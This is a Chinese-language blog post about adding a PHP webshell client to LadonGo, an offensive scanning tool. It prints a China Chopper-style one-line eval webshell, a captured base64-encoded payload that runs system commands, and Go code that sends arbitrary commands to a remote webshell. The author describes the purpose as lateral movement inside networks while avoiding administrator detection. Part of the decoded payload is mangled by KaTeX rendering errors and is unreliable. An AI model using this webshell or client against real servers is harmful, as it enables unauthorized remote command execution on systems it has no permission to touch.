LadonGo实现菜刀连接webshell一句话执行cmd代码

背景

最近VPS被人D比较卡，有时候M都不定连得上，或者连上了也难代理出来，所以需要一个命令行下连接内网WEBSHELL执行命令的工具，当然这个功能Ladon早有了。主要是因为在Linux下横向渗透连接内网其它机器执行命令，GO版还没有，所以先给LadonGo添加PHP一句话的连接功能，其它webshell有空再加。

PS：其实主要是另一个原因，好像M在某个LNX环境下有问题，兼容性非常差有个BUG，NC或代理工具等可连网程序通过M执行后经常容易僵尸进程，出此意外得重启M或重启系统才行，而出现僵尸进程时又还显示网络连接时，很容易被管理员发现，所以代理等连网程序能不用就不用。

菜刀PHP一句话

<?php @eval($_POST[tom])?>

连接执行代码

通过Post提交tom参数，可执行PHP代码，如tom=phpinfo();

当然也可以简单粗暴的执行cmd命令，如tom=system(whoami);

但是这样过于明显，会直接暴露我们执行的命令，所以最好做个加密

菜刀一句话抓包

使用菜刀原版或K8飞刀的菜刀模式连接PHP一句话执行命令

K8飞刀的菜刀选项连接PHP一句话，抓包内容如下：

tom=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHBocFN0dWR5XFBIUFR1dG9yaWFsXFdXVyImd2hvYW1pJmVjaG8gW1NdJmNkJmVjaG8gW0Vd

可以看到提交的包使用了URL编码和Base64编码，想知道菜刀如何通讯执行CMD命令或者说有无后门，我们就得将其解密。几年前我曾发过抓过狗菜刀的后门，和此文章同理。

验证数据包

K8飞刀-HackIE模块可测试提交抓到的包，看其是否能正常工作

URL编码解密

打开K8飞刀–编码模块(第3个图标)–粘贴抓包数据–复制需要解密的内容–右键编码转换–URL编码–URL编码解密

Base64编码解密z1

K8飞刀–右键选中Z1后面内容—编码转换–Base64编码–Base64编码解密

Base64编码解密z2

明文结果

完全解密后，我们发现整段代码执行命令参数在z2，执行cmd的post包直接替换z2参数中的whoami再转成base64编码即可实现菜刀连接PHP一句话执行CMD的功能。

tom=@eval(base64_decode(KaTeX parse error: Expected 'EOF', got '&' at position 13: _POST[z0]));&̲z0=@ini_set("di…p=base64_decode( P O S T [ " z 1 " ] ) ; _POST["z1"]); POST["z1"]);s=base64_decode( P O S T [ " z 2 " ] ) ; _POST["z2"]); POST["z2"]);d=dirname( S E R V E R [ " S C R I P T F I L E N A M E " ] ) ; _SERVER["SCRIPT_FILENAME"]); SERVER["SCRIPTFILENAME"]);c=substr(KaTeX parse error: Can't use function '\"' in math mode at position 17: …,0,1)=="/"?"-c \̲"̲{s}"":"/c “{KaTeX parse error: Expected 'EOF', got '}' at position 2: s}̲\"";r=”{KaTeX parse error: Expected 'EOF', got '}' at position 2: p}̲ {c}";@system(KaTeX parse error: Expected 'EOF', got '&' at position 7: r." 2>&̲1",ret);print (KaTeX parse error: Expected '}', got 'EOF' at end of input: ret!=0)?" ret={ret}

“:”";;echo("|<-");die();&z1=Y21k&z2=cd /d “C:\phpStudy\PHPTutorial\WWW”&whoami&echo [S]&cd&echo [E]

Go连接PHP一句话

package rexec//Ladon Scanner for golang//Author: k8gege//K8Blog: /Ladon//Github: /k8gege/LadonGoimport (_"compress/gzip""encoding/base64""fmt""io/ioutil""net/http""regexp""strings")var PhpShellHelp = func () {fmt.Println("Usage: Ladon PhpShell url pwd cmd")fmt.Println("Example: Ladon PhpShell http://192.168.1.8/1.php pass whoami")}func PhpShellExec(url,pwd,cmdline string) {payload := "echo '<result>';&"+cmdline+"&echo '</result>';"encodeString := base64.StdEncoding.EncodeToString([]byte(payload))data :=pwd+`=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=`req, _ := http.NewRequest("POST", url, strings.NewReader(data+encodeString))req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36")req.Header.Set("Connection", "keep-alive")req.Header.Set("Content-Type", "application/x-www-form-urlencoded")req.Header.Set("Accept-Encoding", "gzip,deflate")resp, err := (&http.Client{}).Do(req)if err != nil {fmt.Println("error")}body, err := ioutil.ReadAll(resp.Body)//fmt.Println(string(body))reg := regexp.MustCompile(`->\|(?s:(.*?))\|<-`)if reg == nil {fmt.Println("regex error")return}str := string(body)result := reg.FindAllStringSubmatch(str,-1)for _, text := range result {fmt.Println(text[1])}}

PS: C#版代码可自行查看k8fly